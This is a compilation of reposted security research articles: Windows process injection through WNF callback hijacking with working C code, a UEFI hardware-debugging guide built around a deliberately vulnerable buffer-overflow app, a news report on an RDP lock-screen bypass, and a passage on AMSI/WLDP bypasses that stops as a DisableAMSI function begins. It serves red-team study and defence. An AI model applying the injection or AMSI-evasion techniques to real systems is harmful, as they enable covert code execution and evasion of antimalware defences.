Windows Process Injection : Windows Notification Facility

Original text by modexp

Introduction

At Blackhat 2018, Alex Ionescu and Gabrielle Viala presented Windows Notification Facility: Peeling the Onion of the Most Undocumented Kernel Attack Surface Yet. It’s an exceptional well-researched presentation that I recommend you watch first before reading this post. In it, they describe WNF in great detail; the functions, data structures, how to interact with it. If you don’t wish to watch the whole video, well, you’re missing out on a cool presentation, but you can always read the slides from their talk here. Gabrielle followed up with a another well-detailed post called Playing with the Windows Notification Facility (WNF) that is also required reading if you want to understand the internals of WNF. You can find some of their tools here which allow dumping information about state names and subscribing for events. As suggested in the presentation, WNF can be used for code redirection/process injection which is what I’ll describe here. wezmaster has demonstrated how to use WNF for persisting .NET payloads here.

Context Header

The table, user and name subscriptions all have a context header.

typedef struct _WNF_CONTEXT_HEADER {
    CSHORT                   NodeTypeCode;
    CSHORT                   NodeByteSize;
} WNF_CONTEXT_HEADER, *PWNF_CONTEXT_HEADER;

The NodeTypeCode field indicates the type of structure that will appear after the header. The following are some examples.

#define WNF_NODE_SUBSCRIPTION_TABLE  0x911
#define WNF_NODE_NAME_SUBSCRIPTION   0x912
#define WNF_NODE_SERIALIZATION_GROUP 0x913
#define WNF_NODE_USER_SUBSCRIPTION   0x914

For a target process, we scan all writeable areas of memory and attempt to read sizeof(WNF_SUBSCRIPTION_TABLE). For each successful read, the Header.NodeTypeCode is compared with WNF_NODE_SUBSCRIPTION_TABLE while the NodeByteSize is compared with sizeof(WNF_SUBSCRIPTION_TABLE). The type code and byte size are unique to WNF and can be used to locate WNF structures in memory provided no such similar structures exist.

UPDATEAdam suggested finding the address of WNF table via a function referencing it. You could also search pointers in the .data section or PEB.ProcessHeap. Each of these methods would likely be faster than searching all writeable areas of memory that includes stack memory.

Subscription Table

Created by NTDLL.dll!RtlpInitializeWnf and assigned type 0x911. Both NTDLL.dll!RtlRegisterForWnfMetaNotification and NTDLL.dll!RtlSubscribeWnfStateChangeNotification will create the table if one doesn’t already exist. You could hijack the callback function in TP_TIMER to redirect code, but since this post is about WNF, we need to look at the other structures.

typedef struct _WNF_SUBSCRIPTION_TABLE {
    WNF_CONTEXT_HEADER                Header;
    SRWLOCK                           NamesTableLock;
    LIST_ENTRY                        NamesTableEntry;
    LIST_ENTRY                        SerializationGroupListHead;
    SRWLOCK                           SerializationGroupLock;
    DWORD                             Unknown1[2];
    DWORD                             SubscribedEventSet;
    DWORD                             Unknown2[2];
    PTP_TIMER                         Timer;
    ULONG64                           TimerDueTime;
} WNF_SUBSCRIPTION_TABLE, *PWNF_SUBSCRIPTION_TABLE;

The main field we’re interested in is the NamesTableEntry that will point to a list of WNF_NAME_SUBSCRIPTION structures.

Serialization Group

Created by NTDLL.dll!RtlpCreateSerializationGroup and assigned type 0x913. Although not important for process injection, It’s here for reference since it wasn’t described in the presentation.

typedef struct _WNF_SERIALIZATION_GROUP {
    WNF_CONTEXT_HEADER                Header;
    ULONG                             GroupId;
    LIST_ENTRY                        SerializationGroupList;
    ULONG64                           SerializationGroupValue;
    ULONG64                           SerializationGroupMemberCount;
} WNF_SERIALIZATION_GROUP, *PWNF_SERIALIZATION_GROUP;

Name Subscription

Created by NTDLL.dll!RtlpCreateWnfNameSubscription and assigned type 0x912. When subscribing for notifications, an attempt will be made to locate an existing name subscription and simply insert a user subscription into the SubscriptionsList using NTDLL.dll!RtlpAddWnfUserSubToNameSub.

typedef struct _WNF_NAME_SUBSCRIPTION {
    WNF_CONTEXT_HEADER                Header;
    ULONG64                           SubscriptionId;
    WNF_STATE_NAME_INTERNAL           StateName;
    WNF_CHANGE_STAMP                  CurrentChangeStamp;
    LIST_ENTRY                        NamesTableEntry;
    PWNF_TYPE_ID                      TypeId;
    SRWLOCK                           SubscriptionLock;
    LIST_ENTRY                        SubscriptionsListHead;
    ULONG                             NormalDeliverySubscriptions;
    ULONG                             NotificationTypeCount[5];
    PWNF_DELIVERY_DESCRIPTOR          RetryDescriptor;
    ULONG                             DeliveryState;
    ULONG64                           ReliableRetryTime;
} WNF_NAME_SUBSCRIPTION, *PWNF_NAME_SUBSCRIPTION;

The main fields we’re interested in are NamesTableEntry and SubscriptionsListHead for each user subscription that is described next.

User Subscription

Created by NTDLL.dll!RtlpCreateWnfUserSubscription and assigned type 0x914. This is the main structure one would want to modify for process injection or code redirection.

typedef struct _WNF_USER_SUBSCRIPTION {
    WNF_CONTEXT_HEADER                Header;
    LIST_ENTRY                        SubscriptionsListEntry;
    PWNF_NAME_SUBSCRIPTION            NameSubscription;
    PWNF_USER_CALLBACK                Callback;
    PVOID                             CallbackContext;
    ULONG64                           SubProcessTag;
    ULONG                             CurrentChangeStamp;
    ULONG                             DeliveryOptions;
    ULONG                             SubscribedEventSet;
    PWNF_SERIALIZATION_GROUP          SerializationGroup;
    ULONG                             UserSubscriptionCount;
    ULONG64                           Unknown[10];
} WNF_USER_SUBSCRIPTION, *PWNF_USER_SUBSCRIPTION;

We’re interested in the Callback and CallbackContext fields. If the context pointed to a virtual function table and one of the methods was executed upon receiving a notification from the kernel, then it probably wouldn’t require modifying Callback at all. To make things easier, the PoC only modifies the Callback value.

Callback Prototype

Six parameters are passed to a callback procedure. Both Buffer and CallbackContext could be utilized to pass in arbitrary code or commands, but since the PoC only executes notepad.exe, the parameters are ignored. That being said, it’s still important to use the same prototype for a payload so that the parameters are safely removed from the stack before returning to the caller.

typedef NTSTATUS (*PWNF_USER_CALLBACK) (
    _In_     WNF_STATE_NAME   StateName,
    _In_     WNF_CHANGE_STAMP ChangeStamp,
    _In_opt_ PWNF_TYPE_ID     TypeId,
    _In_opt_ PVOID            CallbackContext,
    _In_     PVOID            Buffer,
    _In_     ULONG            BufferSize);

Listing Subscriptions

To help locate the WNF subscription table in a remote process, I wrote a simple tool called wnfscan that searches all writeable areas of memory for the context header. Once found, it parses and displays a list of name and user subscriptions.

Process Injection

Because we have to locate the WNF subscription table by scanning memory, this method of injection is more complicated than others. We don’t search for WNF_USER_SUBSCRIPTIONstructures because they appear higher up in memory and take too long to find. Scanning for the table first is much faster since it’s usually created when the process starts thus appearing lower in memory. Once the table is found, the name subscriptions are read and a user subscription is returned.

VOID wnf_inject(LPVOID payload, DWORD payloadSize) {
    WNF_USER_SUBSCRIPTION  us;
    LPVOID                 sa, cs;
    HWND                   hw;
    HANDLE                 hp;
    DWORD                  pid;
    SIZE_T                 wr;
    ULONG64                ns = WNF_SHEL_APPLICATION_STARTED;
    NtUpdateWnfStateData_t _NtUpdateWnfStateData;
    HMODULE                m;
      
    // 1. Open explorer.exe
    hw = FindWindow(L"Shell_TrayWnd", NULL);
    GetWindowThreadProcessId(hw, &pid);
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    
    // 2. Locate user subscription
    sa = GetUserSubFromProcess(hp, &us, WNF_SHEL_APPLICATION_STARTED);

    // 3. Allocate RWX memory and write payload
    cs = VirtualAllocEx(hp, NULL, payloadSize,
        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    
    // 4. Update callback and trigger execution of payload
    WriteProcessMemory(
      hp, 
      (PBYTE)sa + offsetof(WNF_USER_SUBSCRIPTION, Callback), 
      &cs,
      sizeof(ULONG_PTR),
      &wr);
      
    m = GetModuleHandle(L"ntdll");
    _NtUpdateWnfStateData = 
      (NtUpdateWnfStateData_t)GetProcAddress(m, "NtUpdateWnfStateData");
      
    _NtUpdateWnfStateData(
      &ns, NULL, 0, 0, NULL, 0, 0);
      
    // 5. Restore original callback, free memory and close process
    WriteProcessMemory(
      hp, 
      (PBYTE)sa + offsetof(WNF_USER_SUBSCRIPTION, Callback), 
      &us.Callback,
      sizeof(ULONG_PTR),
      &wr);
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    CloseHandle(hp);
}

Summary

Since it’s possible to transfer data into the address space of a remote process via WNF publishing, it may be possible to avoid using VirtualAllocEx and WriteProcessMemory. Some .NET processes allocate executable memory with write permissions that could be misused by an external process for code injection. A PoC that executes notepad can be found here.

Реклама

Debug UEFI code by single-stepping your Coffee Lake-S hardware CPU

Original text by Teddy Reed V

In the post I will cover:

  • Configuring an ASRock H370M-ITX/ac to allow DCI DbC debugging
  • Using Intel System Studio and System Debugger to single-step a Coffee Lake-S i7-8700 CPU
  • Debugging an example exploitable UEFI application on hardware

USB DCI DbC Debugging (JTAG over USB3)

TL;DR, if you have a newer CPU & chipset you can purchase a $15 off-the-shelf cable and single-step your hardware threads. The cable is a USB 3.0 debugging cable; and is similar to an ethernet crossover cable in the sense that the internal wiring is crossed. Be careful with this cable as unsupported machines will have undefined behavior due to the electronics of USB.

Newer Intel CPUs support debugging over USB3 via a proprietary Direct Connection Interface (DCI) with the use of off-the-shelf hardware. This applies to some 6th-generation CPU and chipset combinations, and most 7th-generation and newer setups. I have not found the specific CPU/chipsec combinations but my educated guess from the Core series is as follows:

  • Kaby Lake / Intel 100 or 200 series SunrisePoint
  • Coffee Lake-S / Intel Z370, H370, H310, or B360
  • Kaby Lake R / 6th-gen Intel Core
  • Whiskey Lake-U (8565U, 8265U, 8145U)
  • Coffee Lake-S / H370, H310, B360

These combinations should support «DCI USB 3.x Debug Class» debugging. This means you only need the inexpensive debug cable linked above. Note that if debug-cable debugging is not support then a proprietary interposing device is required via a purchase from Intel.

From the documentation I’ve read, the USB3 hardware on a supported machine decodes DCI commands, forwards them to an appropriate hardware module on the target CPU that translates them to JTAG sequences. Intel provides a free-to-use, renewably-licenced, Intel System Studio and System Debugger software along with a DCI implementation called OpenDCI. This debugging environment is built with Eclipse and supported on macOS, Linux, and Windows. I’ve only found OpenDCI support for DbC-compatible targets on the Windows version.

You will need a Windows 10 install and Intel System Studio if you are following along.

Enable DCI on the ASRock H370M-ITX/ac

TL;DR you will need to enable and disable undocumented settings within UEFI by flipping several bits in a UEFI variable.

If you are doing casual research on DCI you will find several references to using a BIOS version with DCI enabled or using a UEFI debug build. I am sure they will be very helpful but it is not possible to acquire this in a general sense. However, we can still follow guidance on «modding» our UEFI to enable DCI. I found eiselekd’s DCI-enable guidance extremely helpful.

  1. Use chipsec to dump your SPI contents to disk. e.g., chipsec_util spi dump rom.bin
  2. Open rom.bin with UEFITool and extract GUID 899407D7-99FE-43D8-9A21-79EC328CAC21 (the Setup UEFI variable).
  3. Use IFRExtractor to print a textual representation of the variable options.

The variables settings required for the H370M-ITX/ac are as follows, tested on version 3.10 and 4.00 UEFI releases:

  • Enable/Disable IED (Intel Enhanced Debug): offset 0x960, set to enabled 0x1
  • CPU Run Control: offset 0x663, set to enabled 0x1
  • CPU Run Control Lock: offset 0x664, set to disabled 0x0
  • Platform Debug COnnect: offset 0x114F, set to 0x03 to enable DCI DbC
  • xDCI Support: offset 0xABD, set to enabled 0x1

To modify and save these offsets follow the guidance above to use the UEFI Shell and RU.efi application by James Wang.

You can confirm that DCI is enabled by reading the USB3 device class label when you connect the debug cable into your host and target machines. The host should have Intel System Studio installed and the target is the H370M-ITC/ac. The host USB driver will read «Intel USB Native Debug Class Devices» if DCI is enabled. If there is an error you will see «Port Reset Failed«. An easy way to view the detailed USB device information is with USB Tree View. Chipsec will also report if DCI is enabled but I found that DbC-specific availability is not reported; so use the USB device driver selection in Windows to confirm the UEFI options are set correctly.

Single-stepping the i7-8700

To recap the requirements and setup:

  • You have a host machine running Windows 10 with Intel System Studio installed
  • The host machine and target i7-8700/H370M-ITX/ac are connected via a USB3 DbC cabled
  • The host machine shows a connected «Intel USB Native Debug Class Device» USB device

Interrupt the target machine’s boot such that you enter UEFI Setup (press F2). This is not required but it will help while following along with the address space and other layout details. I have not figured out how to halt the CPU on reset with DCI and DbC.

In Intel System Studio you should open System Debugger and configure your target connection to use «8th Gen Intel Core Processors (Coffee Lake-S) _ Intel H370 Chipset Intel H310 Chipset Intel B360 Chipset for Consumer (Cannon Lake PCH)» using the connection method: «Intel(R) DCI USB 3.x Debug Class«

Upon success you will see status output similar to the following:

22:02:20 [INFO ] TCA - IPConnection: Open Connection, configuration: CFL_CNP_OpenDCI_DBC_Only_ReferenceSettings.
22:02:57 [INFO ] Starting DAL ...
22:02:57 [DAL  ] The system cannot find the batch label specified - SetScriptPath
22:02:58 [DAL  ] Registering MasterFrame...
22:03:00 [DAL  ] Using Intel DAL 1.1905.602.100 
22:03:00 [DAL  ] Using python.exe 2.7.15 (64bit), .NET 2.0.50727.8940, Python.NET 2.0.19, pyreadline 2.1.1
22:03:02 [DAL  ]     Note:    The 'coregroupsactive' control variable has been set to 'GPC'
22:03:10 [DAL  ] Using CFL_CNP_OpenDCI_DBC_Only_ReferenceSettings
22:03:10 [DAL  ] >>? DAL startup completed
22:03:10 [INFO ] Connection Manager: Status change: CONNECTED
    Connection: 8th Gen Intel Core Processors (Coffee Lake-S) _ Intel H370 Chipset Intel H310 Chipset Intel B360 Chipset for Consumer (Cannon Lake PCH)
    Target: 8th Gen Intel Core Processors (Coffee Lake-S) / Intel H370 Chipset, Intel H310 Chipset, Intel B360 Chipset for Consumer (Cannon Lake PCH)
    Connection Method: Intel(R) DCI USB 3.x Debug Class

And output similar to the following screen captures:

The connection will also pause the CPU threads and show you the nearby disassembly. If the CPU is not paused and clicking the «pause» button fails you have not enabled DCI completely. For example, if you encounter either, ExecutionControlUnableToHaltAllException, or operation not allowed while the processor is in state 'running' then double-check the UEFI Setup variable options.

A successful connection will show a UI similar to the following:

And you can now View and inspect memory as well as other common JTAG-debugging features.

Debugging an example exploitable UEFI application on hardware

TL;DR this is extremely simple and thus a great toy example, due to the lack of platform runtime security in UEFI and lack of build and compile security in the UEFI development kit (EDK/UDK).

The goal is to build a «toy» vulnerable UEFI application, trigger the exploitation, and observe the behavior within the System Debugger on the connected host. The first step is to configure the edk2 build environment. This is well-documented in several places.

I will modify the HelloWorld application and replace the MdeModulePkg/Application/HelloWorld/HelloWorld.c with the following content.

#include <Uefi.h>
#include <Library/UefiLib.h>
#include <Library/UefiApplicationEntryPoint.h>

#include <Protocol/LoadedImage.h>
#include <Library/UefiBootServicesTableLib.h>
#include <Library/MemoryAllocationLib.h>

VOID RunAsm();

CHAR16* GetArgv(IN EFI_HANDLE ImageHandle)
{
  EFI_LOADED_IMAGE* li;
  EFI_GUID loaded_image_protocol = LOADED_IMAGE_PROTOCOL;
  gBS->HandleProtocol(ImageHandle, &loaded_image_protocol, (void**) &li);

  CHAR16* wargv = (CHAR16 *)li->LoadOptions;
  return wargv;
}

VOID RunMe()
{
  Print(L"You win\n");
  RunAsm();
}

UINT32 StrLenChar(CHAR8* src) {
  UINT32 ret = 0;
  while (src[ret++] != 0) {}
  return ret - 1;
}

VOID StrCpy(CHAR8* dst, CHAR16* src, UINT32 length) {
  CHAR8 *src8 = (CHAR8*)src;
  for (UINT32 i = 0; i < length; i++) {
    dst[i] = src8[(i*2)];
  }

  UINT64 loc = (UINT64)&RunMe;
  dst[length - 1] = 0;
  dst[length - 2] = 0;
  dst[length - 3] = 0;
  dst[length - 4] = 0;
  dst[length - 5] = ((loc >> (8 * 3)) & 0xFF);
  dst[length - 6] = ((loc >> (8 * 2)) & 0xFF);
  dst[length - 7] = ((loc >> (8 * 1)) & 0xFF);
  dst[length - 8] = ((loc >> (8 * 0)) & 0xFF);
}

 __attribute__((noinline)) VOID
 TestBufferOverflow(CHAR16* input)
 {
  /* Test stack buffer overflow */

  // Compiled with EDKII that auto-adds (-fno-stack-protector)
  CHAR8 buffer[32];
  StrCpy((CHAR8*)buffer, input, StrLen(input));
  buffer[StrLen(input)] = 0;
}

EFI_STATUS EFIAPI UefiMain (
  IN EFI_HANDLE        ImageHandle,
  IN EFI_SYSTEM_TABLE  *SystemTable
) {
  // Run with: fs0:X64\HelloWorld.efi A*222

  Print(L"UefiMain=0x%p\n", &UefiMain);
  CHAR16* wargv = GetArgv(ImageHandle);
  UINT32 wargv_len = StrLen(wargv);
  TestBufferOverflow(wargv);

  return EFI_SUCCESS;
}

The specific build command is

$ . ./edksetup.sh BaseTools
$ build -m MdeModulePkg/Application/HelloWorld/HelloWorld.inf -p MdeModulePkg/MdeModulePkg.dsc

And if you would like to test that this runs follow the QEMU debugging guide and use:

$ qemu-system-x86_64 -bios /usr/share/OVMF/OVMF_PURE_EFI.fd -display none -nodefaults -serial stdio -hda fat:Build/MdeModule/DEBUG_GCC5

The code above is a sythethetic stack-based buffer overflow example. It will auto-fill in the overwritten ret address for you. If you want to learn what is happening here please read Dhaval’s articles on Buffer Overflows. As a note, we could choose to make this more realistic (e.g., remove the auto-filled ret) by reading a file into the vulnerable stack variable.

The default edk2 build configuration will compile the overflow into the following flow, where the StrCpy logic is inlined:

Our goal is to copy 0x30 characters into the buffer, overflowing the expected 0x20, the 8 for the saved RBX, and 16 for RSP and RIP; at which point the final 8 will be filled in with the address of RunMe.

For some fast feedback we’ll print to ConsoleOut then reset the CPU using:

ASM_GLOBAL ASM_PFX(RunAsm)
ASM_PFX(RunAsm):
    mov $254, %al
    out %al, $100
    ret

If a console is not available then this functions well for blind-testing control of rip.

Because we are printing the location of UefiMain we can both confirm that each time the application is executed the address is constant and know what location to set a hardware breakpoint in System Debugger so we can single-step and watch the overflow.

For my UEFI build this location was 0x600BC69C, which means the .text is loaded to an offset of 0x600BB000 as this subroutine is 0x169C. From here we can add more breakpoints in System Debugger.

Unpatched Bug Let Attackers Bypass Windows Lock Screen On RDP Sessions

Original text by Swati Khandelwal

A security researcher today revealed details of a newly unpatched vulnerability in Microsoft Windows Remote Desktop Protocol (RDP).

Tracked as CVE-2019-9510, the reported vulnerability could allow client-side attackers to bypass the lock screen on remote desktop (RD) sessions.

Discovered by Joe Tammariello of Carnegie Mellon University Software Engineering Institute (SEI), the flaw exists when Microsoft Windows Remote Desktop feature requires clients to authenticate with Network Level Authentication (NLA), a feature that Microsoft recently recommended as a workaround against the critical BlueKeep RDP vulnerability.

According to Will Dormann, a vulnerability analyst at the CERT/CC, if a network anomaly triggers a temporary RDP disconnect while a client was already connected to the server but the login screen is locked, then «upon reconnection the RDP session will be restored to an unlocked state, regardless of how the remote system was left.»

«Starting with Windows 10 1803 and Windows Server 2019, Windows RDP handling of NLA-based RDP sessions has changed in a way that can cause unexpected behavior with respect to session locking,» Dormann explains in an advisory published today.

«Two-factor authentication systems that integrate with the Windows login screen, such as Duo Security MFA, are also bypassed using this mechanism. Any login banners enforced by an organization will also be bypassed.»

The CERT describes the attack scenario as the following:

  • A targeted user connects to a Windows 10 or Server 2019 system via RDS.
  • The user locks the remote session and leaves the client device unattended.
  • At this point, an attacker with access to the client device can interrupt its network connectivity and gain access to the remote system without needing any credentials.

This means that exploiting this vulnerability is very trivial, as an attacker just needs to interrupt the network connectivity of a targeted system.

However, since the attacker requires physical access to such a targeted system (i.e., an active session with locked screen), the scenario itself limits the attack surface to a greater extent.

Tammariello notified Microsoft of the vulnerability on April 19, but the company responded by saying the «behavior does not meet the Microsoft Security Servicing Criteria for Windows,» which means the tech giant has no plans to patch the issue anytime soon.

However, users can protect themselves against potential exploitation of this vulnerability by locking the local system instead of the remote system, and by disconnecting the remote desktop sessions instead of just locking them.



How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code

Original text by modexp

1. Introduction

v4.8 of the dotnet framework uses Antimalware Scan Interface (AMSI) and Windows Lockdown Policy (WLDP) to block potentially unwanted software running from memory. WLDP will verify the digital signature of dynamic code while AMSI will scan for software that is either harmful or blocked by the administrator. This post documents three publicly-known methods red teams currently use to bypass AMSI and one to bypass WLDP. The bypass methods described are somewhat generic and don’t require special knowledge of AMSI or WLDP. If you’re reading this post anytime after June 2019, the methods may no longer work. The research of AMSI and WLDP was conducted in collaboration with TheWover.

2. Previous Research

The following table includes links to past research about AMSI and WLDP. If you feel I’ve missed anyone, don’t hesitate to e-mail me the details.

DateArticle
May 2016Bypassing Amsi using PowerShell 5 DLL Hijacking by Cneelis
Jul 2017Bypassing AMSI via COM Server Hijacking by Matt Nelson
Jul 2017Bypassing Device Guard with .NET Assembly Compilation Methods by Matt Graeber
Feb 2018AMSI Bypass With a Null Character by Satoshi Tanda
Feb 2018AMSI Bypass: Patching Technique by CyberArk (Avi Gimpel and Zeev Ben Porat).
Feb 2018The Rise and Fall of AMSI by Tal Liberman (Ensilo).
May 2018AMSI Bypass Redux by Avi Gimpel (CyberArk).
Jun 2018Exploring PowerShell AMSI and Logging Evasion by Adam Chester
Jun 2018Disabling AMSI in JScript with One Simple Trick by James Forshaw
Jun 2018Documenting and Attacking a Windows Defender Application Control Feature the Hard Way – A Case Study in Security Research Methodology by Matt Graeber
Oct 2018How to bypass AMSI and execute ANY malicious Powershell code by Andre Marques
Oct 2018AmsiScanBuffer Bypass Part 1Part 2Part 3Part 4 by Rasta Mouse
Dec 2018PoC function to corrupt the g_amsiContext global variable in clr.dll by Matt Graeber
Apr 2019Bypassing AMSI for VBA by Pieter Ceelen (Outflank)

3. AMSI Example in C

Given the path to a file, the following function will open it, map into memory and use AMSI to detect if the contents are harmful or blocked by the administrator.

typedef HRESULT (WINAPI *AmsiInitialize_t)(
  LPCWSTR      appName,
  HAMSICONTEXT *amsiContext);

typedef HRESULT (WINAPI *AmsiScanBuffer_t)(
  HAMSICONTEXT amsiContext,
  PVOID        buffer,
  ULONG        length,
  LPCWSTR      contentName,
  HAMSISESSION amsiSession,
  AMSI_RESULT  *result);

typedef void (WINAPI *AmsiUninitialize_t)(
  HAMSICONTEXT amsiContext);
  
BOOL IsMalware(const char *path) {
    AmsiInitialize_t   _AmsiInitialize;
    AmsiScanBuffer_t   _AmsiScanBuffer;
    AmsiUninitialize_t _AmsiUninitialize;
    HAMSICONTEXT       ctx;
    AMSI_RESULT        res;
    HMODULE            amsi;
    
    HANDLE             file, map, mem;
    HRESULT            hr = -1;
    DWORD              size, high;
    BOOL               malware = FALSE;
    
    // load amsi library
    amsi = LoadLibrary("amsi");
    
    // resolve functions
    _AmsiInitialize = 
      (AmsiInitialize_t)
      GetProcAddress(amsi, "AmsiInitialize");
    
    _AmsiScanBuffer =
      (AmsiScanBuffer_t)
      GetProcAddress(amsi, "AmsiScanBuffer");
      
    _AmsiUninitialize = 
      (AmsiUninitialize_t)
      GetProcAddress(amsi, "AmsiUninitialize");
      
    // return FALSE on failure
    if(_AmsiInitialize   == NULL ||
       _AmsiScanBuffer   == NULL ||
       _AmsiUninitialize == NULL) {
      printf("Unable to resolve AMSI functions.\n");
      return FALSE;
    }
    
    // open file for reading
    file = CreateFile(
      path, GENERIC_READ, FILE_SHARE_READ,
      NULL, OPEN_EXISTING, 
      FILE_ATTRIBUTE_NORMAL, NULL); 
    
    if(file != INVALID_HANDLE_VALUE) {
      // get size
      size = GetFileSize(file, &high);
      if(size != 0) {
        // create mapping
        map = CreateFileMapping(
          file, NULL, PAGE_READONLY, 0, 0, 0);
          
        if(map != NULL) {
          // get pointer to memory
          mem = MapViewOfFile(
            map, FILE_MAP_READ, 0, 0, 0);
            
          if(mem != NULL) {
            // scan for malware
            hr = _AmsiInitialize(L"AMSI Example", &ctx);
            if(hr == S_OK) {
              hr = _AmsiScanBuffer(ctx, mem, size, NULL, 0, &res);
              if(hr == S_OK) {
                malware = (AmsiResultIsMalware(res) || 
                           AmsiResultIsBlockedByAdmin(res));
              }
              _AmsiUninitialize(ctx);
            }              
            UnmapViewOfFile(mem);
          }
          CloseHandle(map);
        }
      }
      CloseHandle(file);
    }
    return malware;
}

Scanning a good and bad file.

If you’re already familiar with the internals of AMSI, you can skip to the bypass methods here.

4. AMSI Context

The context is an undocumented structure, but you may use the following to interpret the handle returned.

typedef struct tagHAMSICONTEXT {
  DWORD        Signature;          // "AMSI" or 0x49534D41
  PWCHAR       AppName;            // set by AmsiInitialize
  IAntimalware *Antimalware;       // set by AmsiInitialize
  DWORD        SessionCount;       // increased by AmsiOpenSession
} _HAMSICONTEXT, *_PHAMSICONTEXT;

5. AMSI Initialization

appName points to a user-defined string in unicode format while amsiContext points to a handle of type HAMSICONTEXT. It returns S_OK if an AMSI context was successfully initialized. The following code is not a full implementation of the function, but should help you understand what happens internally.

HRESULT _AmsiInitialize(LPCWSTR appName, HAMSICONTEXT *amsiContext) {
    _HAMSICONTEXT *ctx;
    HRESULT       hr;
    int           nameLen;
    IClassFactory *clsFactory = NULL;
    
    // invalid arguments?
    if(appName == NULL || amsiContext == NULL) {
      return E_INVALIDARG;
    }
    
    // allocate memory for context
    ctx = (_HAMSICONTEXT*)CoTaskMemAlloc(sizeof(_HAMSICONTEXT));
    if(ctx == NULL) {
      return E_OUTOFMEMORY;
    }
    
    // initialize to zero
    ZeroMemory(ctx, sizeof(_HAMSICONTEXT));
    
    // set the signature to "AMSI"
    ctx->Signature = 0x49534D41;
    
    // allocate memory for the appName and copy to buffer
    nameLen = (lstrlen(appName) + 1) * sizeof(WCHAR);
    ctx->AppName = (PWCHAR)CoTaskMemAlloc(nameLen);
    
    if(ctx->AppName == NULL) {
      hr = E_OUTOFMEMORY;
    } else {
      // set the app name
      lstrcpy(ctx->AppName, appName);
      
      // instantiate class factory
      hr = DllGetClassObject(
        CLSID_Antimalware, 
        IID_IClassFactory, 
        (LPVOID*)&clsFactory);
        
      if(hr == S_OK) {
        // instantiate Antimalware interface
        hr = clsFactory->CreateInstance(
          NULL,
          IID_IAntimalware, 
          (LPVOID*)&ctx->Antimalware);
        
        // free class factory
        clsFactory->Release();
        
        // save pointer to context
        *amsiContext = ctx;
      }
    }
    
    // if anything failed, free context
    if(hr != S_OK) {
      AmsiFreeContext(ctx);
    }
    return hr;
}

Memory is allocated on the heap for a HAMSICONTEXT structure and initialized using the appName, the AMSI signature (0x49534D41) and IAntimalware interface.

6. AMSI Scanning

The following code gives you a rough idea of what happens when the function is invoked. If the scan is successful, the result returned will be S_OK and the AMSI_RESULT should be inspected to determine if the buffer contains unwanted software.

HRESULT _AmsiScanBuffer(
  HAMSICONTEXT amsiContext,
  PVOID        buffer,
  ULONG        length,
  LPCWSTR      contentName,
  HAMSISESSION amsiSession,
  AMSI_RESULT  *result)
{
    _HAMSICONTEXT *ctx = (_HAMSICONTEXT*)amsiContext;
    
    // validate arguments
    if(buffer           == NULL       ||
       length           == 0          ||
       amsiResult       == NULL       ||
       ctx              == NULL       ||
       ctx->Signature   != 0x49534D41 ||
       ctx->AppName     == NULL       ||
       ctx->Antimalware == NULL)
    {
      return E_INVALIDARG;
    }
    
    // scan buffer
    return ctx->Antimalware->Scan(
      ctx->Antimalware,     // rcx = this
      &CAmsiBufferStream,   // rdx = IAmsiBufferStream interface
      amsiResult,           // r8  = AMSI_RESULT
      NULL,                 // r9  = IAntimalwareProvider
      amsiContext,          // HAMSICONTEXT
      CAmsiBufferStream,
      buffer,
      length, 
      contentName,
      amsiSession);
}

Note how arguments are validated. This is one of the many ways AmsiScanBuffer can be forced to fail and return E_INVALIDARG.

7. CLR Implementation of AMSI

CLR uses a private function called AmsiScan to detect unwanted software passed via a Loadmethod. Detection can result in termination of a .NET process, but not necessarily an unmanaged process using the CLR hosting interfaces. The following code gives you a rough idea of how CLR implements AMSI.

AmsiScanBuffer_t _AmsiScanBuffer;
AmsiInitialize_t _AmsiInitialize;
HAMSICONTEXT     *g_amsiContext;

VOID AmsiScan(PVOID buffer, ULONG length) {
    HMODULE          amsi;
    HAMSICONTEXT     *ctx;
    HAMSI_RESULT     amsiResult;
    HRESULT          hr;
    
    // if global context not initialized
    if(g_amsiContext == NULL) {
      // load AMSI.dll
      amsi = LoadLibraryEx(
        L"amsi.dll", 
        NULL, 
        LOAD_LIBRARY_SEARCH_SYSTEM32);
        
      if(amsi != NULL) {
        // resolve address of init function
        _AmsiInitialize = 
          (AmsiInitialize_t)GetProcAddress(amsi, "AmsiInitialize");
        
        // resolve address of scanning function
        _AmsiScanBuffer =
          (AmsiScanBuffer_t)GetProcAddress(amsi, "AmsiScanBuffer");
        
        // failed to resolve either? exit scan
        if(_AmsiInitialize == NULL ||
           _AmsiScanBuffer == NULL) return;
           
        hr = _AmsiInitialize(L"DotNet", &ctx);
        
        if(hr == S_OK) {
          // update global variable
          g_amsiContext = ctx;
        }
      }
    }
    if(g_amsiContext != NULL) {
      // scan buffer
      hr = _AmsiScanBuffer(
        g_amsiContext,
        buffer,
        length,
        0,
        0,        
        &amsiResult);
        
      if(hr == S_OK) {
        // if malware was detected or it's blocked by admin
        if(AmsiResultIsMalware(amsiResult) ||
           AmsiResultIsBlockedByAdmin(amsiResult))
        {
          // "Operation did not complete successfully because "
          // "the file contains a virus or potentially unwanted" 
          // software.
          GetHRMsg(ERROR_VIRUS_INFECTED, &error_string, 0);
          ThrowHR(COR_E_BADIMAGEFORMAT, &error_string);          
        }           
      }
    }
}

When AmsiScan is called for the first time, it invokes AmsiInitialize, and if successful will return a pointer to an AMSI context. The pointer is then saved to a global variable called g_amsiContext to be used for later scans. If buffer does contain harmful code, ThrowHR is called with COR_E_BADIMAGEFORMAT and ERROR_VIRUS_INFECTED as the secondary error. The problem with this code is that AmsiScanBuffer will return E_INVALIDARG if the AMSI context is corrupt and the fact AmsiScan doesn’t bother to investigate why.

8. AMSI Bypass A (Patching Data)

Matt Graeber provided a PoC that corrupts the context CLR!g_amsiContext points to, thus causing AmsiScanBuffer to return E_INVALIDARG. As you can see from the CLR implementation, this works because the result of CLR!AmsiScan is never validated for success or failure. The assumption is that it will simply throw an error and terminate the host application upon any attempt to load unwanted software. However, an unmanaged application hosting a .NET assembly is likely to handle any C++ exception. Windows Defender would still log the detection of harmful code, but the unmanaged host application would in some cases continue to run. To disable AMSI via g_amsiContext, one can either search through the heap memory pointed to by PEB.ProcessHeap or through each pointer found in the virtual address space of the .data segment. The following code demonstrates the latter approach. This only works _after_ CLR has called AmsiScan.

BOOL DisableAMSI(VOID) {
